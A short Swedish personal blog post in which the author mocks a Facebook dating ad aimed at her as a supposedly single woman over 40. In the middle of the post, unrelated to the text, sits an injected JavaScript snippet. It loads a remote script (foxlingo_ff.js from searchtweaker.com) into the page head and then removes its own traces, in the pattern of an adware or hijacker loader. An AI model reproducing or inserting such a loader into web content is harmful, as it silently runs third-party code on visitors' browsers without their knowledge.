Livet hos Hogengård

HUR tänkte de nu?!

Kolla på bilden som jag klippt från min Facebooksida. Något sticker lite i mina ögon. Då tänker jag inte på sommarklänningarna. 😀

Jag får förtydliga mig lite. Eftersom det inte står att jag är ihop med KJ på Facebook så tycker de ju att jag är singel. Så långt inga konstigheter. Men kolla in annonsen. Är det så att kvinnor över 40 förväntas attraheras av det nyllet?
(function(){try{var header=document.getElementsByTagName(”HEAD”)[0];var script=document.createElement(”SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Lämna ett svar

Din e-postadress kommer inte publiceras. Obligatoriska fält är märkta *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

The reCAPTCHA verification period has expired. Please reload the page.